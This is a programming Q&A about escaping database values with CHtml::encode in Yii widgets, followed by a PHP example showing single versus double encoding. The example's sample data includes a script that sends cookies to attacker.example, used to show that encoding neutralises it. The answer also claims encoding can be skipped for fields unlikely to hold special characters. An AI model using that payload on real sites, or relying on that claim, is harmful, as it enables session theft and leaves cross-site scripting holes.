I'm using Yii as a PHP framework, and when I need to display some information from the database, I always use CHtml::encode to improve security.
My question is: Do I need to do the same when I display values at Yii widgets, such as TbDetailView or TbGridView?
For example, is the CHtml::encode necessary at the code below?
<?php $this->widget('bootstrap.widgets.TbDetailView', array(
    'data' => $model,
    'attributes' => array(
        'id',
        'nome',
        'descricao',
        'origem',
        array('label' => 'Tipo de Refeição', 'value' => CHtml::encode($model->tipoRefeicao ? $model->tipoRefeicao->nome : '')),
        array('label' => 'Ativo', 'value' => CHtml::encode($model->ativo ? 'Sim' : 'Não')),
    ),
)); ?>
The CHtml::encode() function is a wrapper for the PHP htmlspecialchars function: it encodes special characters into HTML entities. Certain characters have special significance in HTML and should be represented by HTML entities if they are to preserve their meanings. The conversions performed are:
- '&' (ampersand) becomes '&amp;'
- '"' (double quote) becomes '&quot;'
- "'" (single quote) becomes '&#039;'
- '<' (less than) becomes '&lt;'
- '>' (greater than) becomes '&gt;'
Meaning that if that field in the DB is likely to contain any of these characters, you will have to encode it, otherwise it might break the HTML output; if it will not, then there is no need to encode it.
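To make the encoding behaviour concrete, here is an added, stand-alone example that is not part of the question or the answer above and does not load Yii. The `encode()` function mirrors what the answer describes, a thin wrapper over `htmlspecialchars`; the `ENT_QUOTES` flag and the UTF-8 charset are assumptions made so that both quote characters in the list above are converted. The sample values, including the script payload, are constructed for the example.

```php
<?php
// Added example (not from the original question or answer): what a
// CHtml::encode()-style wrapper does to values read from the database,
// and what happens when the same value gets encoded twice.
// Assumption: the wrapper is htmlspecialchars() with ENT_QUOTES and UTF-8.
function encode(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Constructed sample rows standing in for values of the question's
// `nome` / `tipoRefeicao->nome` columns. The last one is what an attacker
// who can write to that column would store: unencoded, it runs in the
// browser of everyone who opens the detail view.
$rows = [
    'Café & pão',
    "Almoço 'executivo'",
    '<b>negrito</b> "citado"',
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>',
];

// Renders one detail-view style row. The encoded value is safe both as
// element text and inside the single-quoted title attribute, because
// ENT_QUOTES also converts the apostrophe.
function renderRow(string $label, string $value): string
{
    $safe = encode($value);
    return "<tr><th>{$label}</th><td title='{$safe}'>{$safe}</td></tr>\n";
}

foreach ($rows as $value) {
    $once  = encode($value);
    $twice = encode($once);   // a second pass, as when the widget encodes too

    printf("raw   : %s\n", $value);
    printf("once  : %s\n", $once);
    printf("twice : %s\n", $twice);
    echo renderRow('Nome', $value), "\n";
}
```

Run it with `php example.php`. A single pass turns `&` into `&amp;`, the quotes into `&quot;` and `&#039;`, and the `<script>` payload into inert `&lt;script&gt;...` text that the browser displays instead of executing. The `twice` line shows the cost of encoding in the view when the widget already encodes the attribute value on output: `&amp;` becomes `&amp;amp;` and the user sees a literal `&amp;` on the page. So before wrapping a widget attribute's `value` in CHtml::encode, check whether that widget (and the attribute's `type` setting in your Yii version) already encodes the value on output; encode exactly once, at the point where the value is written into HTML.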